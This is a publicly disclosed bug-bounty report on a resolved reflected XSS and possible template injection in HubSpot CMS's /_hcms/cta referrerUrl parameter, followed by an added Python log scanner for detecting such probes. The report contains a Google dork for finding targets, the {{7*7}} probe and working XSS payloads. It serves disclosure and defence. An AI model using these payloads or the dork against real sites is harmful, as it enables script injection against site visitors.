Reflected XSS and Server Side Template Injection in all HubSpot CMSes
State Resolved (Closed)
Disclosed publicly 2018-09-11T16:27:49.487Z
Reported To
Weakness none
Bounty
Summary by m7mdharoun

While I was trying to catch a bug in the @inflection program, I started to test goodhire.com. It was in scope, but I didn't see that it had a HubSpot CMS. After a lot of testing, I found a small potential Server Side Template Injection.
Then, with some help from @fransrosen, who helped me break out of the elements, I got a reflected XSS.


The Google dork was ( inurl:/_hcms/ )


More than 1000 websites using HubSpot were affected.

Some affected websites:

www.hubspot.com
blog.bugcrowd.com
cashflows.com
pages.bugcrowd.com
www.itbit.com
goodhire.com

It was great to see the HubSpot team resolve this issue within 24 hours of knowing that there was a problem!


Timeline
submitted a report to HubSpot .
2018-01-22T20:29:20.000Z

Really, I don't know why the BugCrowd team closed my submission as N/A.

They mentioned that it was not in scope?!

So I reported it again in another submission, but this time I messaged the security company directly, and it was triaged and fixed in 2 days.


Full PoC:

I found it in this path /_hcms/cta, so this means that it is controlled by the HubSpot service.

The affected parameter was ?referrerUrl=

First, possible Server Side Template Injection:

Server-side template injection occurs when user-controlled input is embedded into a server-side template, allowing users to inject template directives. This allows an attacker to inject malicious template directives and possibly execute arbitrary code on the affected server.

URL-encoded GET input referrerUrl was set to {{7*7}}

The response contained the result of the evaluated expression: 49
I tried to exploit it with Jinja injection, but I failed; I got
Malformed escape pair at index 78: https://www.example.com/content-rendering/v1/public/_hcms/cta?referrerUrl=%7B%for%20c%20in%20%5B1,2,3%5D%20%%7D%7B%7Bc,c,c%7D%7D%7B%%20endfor%20%%7D
Or
Illegal character in query at index 81:


Now the reflected XSS

@fransrosen was able to break out of the element with this payload:
{%25+macro+field(x)+%25}www.com{{x}}+<b>ok</b>{%25+endmacro+%25}{{+field(1)%7curlize+}}

PoC example:

https://www.example.com/_hcms/cta?referrerUrl=%7B%25+macro+field(x)+%25%7Dwww.com%7B%7Bx%7D%7D+<b>ok</b>{%25+endmacro+%25}{{+field(1)%7curlize+}}

The XSS payload was awesome :)

{%25+macro+field()+%25}moc.okok//:ptth//)niamod.tnemucod(trela:tpircsavaj=daolno+gvshttp://http:""//{%25+endmacro+%25}{{+field(1)%7curlize%7creverse%7curlize%7creverse%7curlize%7creverse+}}

Report status: 22/1/2018
HubSpot_Security changed the priority to P2
HubSpot_Security rewarded 20 points to you
HubSpot_Security changed the state to Resolved 23/1/2018

Regards,
Frans
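As an added example (not part of the report or of HubSpot's code), the following Python stdlib script shows how a defender could spot the probes described above in web-server access logs: it isolates the referrerUrl parameter of /_hcms/cta requests, strips repeated percent-encoding, and reports any Jinja/HubL template delimiters found. The log lines are constructed samples.

```python
"""Flag template-injection probes against the /_hcms/cta referrerUrl
parameter in combined-format access logs (constructed sample lines below)."""
import re
from typing import Optional
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Request field of a combined log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Jinja/HubL delimiters after decoding; the report's probes used {{7*7}} and {% macro %}
TEMPLATE_DELIM_RE = re.compile(r"\{\{|\{%|%\}|\}\}")


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding (probes are often double-encoded)."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(target: str) -> Optional[dict]:
    """Return a finding for a /_hcms/cta request whose referrerUrl carries
    template delimiters, otherwise None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/_hcms/cta"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # decodes one layer
    for raw in params.get("referrerUrl", []):
        decoded = fully_decode(raw)
        hits = sorted(set(TEMPLATE_DELIM_RE.findall(decoded)))
        if hits:
            return {"path": parts.path, "decoded": decoded, "delimiters": hits}
    return None


def scan_log(lines):
    """Run inspect_request over every log line; tag findings with the client IP."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        finding = inspect_request(m.group("target"))
        if finding:
            finding["client"] = line.split()[0]
            findings.append(finding)
    return findings


# Constructed sample access-log lines (not real traffic)
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Jan/2018:20:29:20 +0000] "GET /_hcms/cta?referrerUrl=https://www.example.com/pricing HTTP/1.1" 200 512',
    '203.0.113.9 - - [22/Jan/2018:20:31:02 +0000] "GET /_hcms/cta?referrerUrl=%7B%7B7*7%7D%7D HTTP/1.1" 200 498',
    '203.0.113.9 - - [22/Jan/2018:20:32:41 +0000] "GET /_hcms/cta?referrerUrl=%257B%2525+macro+f()+%2525%257D HTTP/1.1" 200 530',
    '198.51.100.7 - - [22/Jan/2018:20:33:00 +0000] "GET /blog/?q=%7B%7Bx%7D%7D HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']} probed {f['path']} with {f['delimiters']}: {f['decoded']!r}")
```

Only requests to the CTA endpoint are inspected, so ordinary template-looking strings elsewhere (the /blog/ line) are not reported; widen the path check if other HubSpot-served paths take the same parameter.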

m7mdharoun Activities::BugResolved
2018-01-23T20:29:20.000Z


m7mdharoun Activities::ReportBecamePublic
2018-09-11T16:27:49.595Z


m7mdharoun Activities::ReportSeverityUpdated
2018-09-11T16:31:03.207Z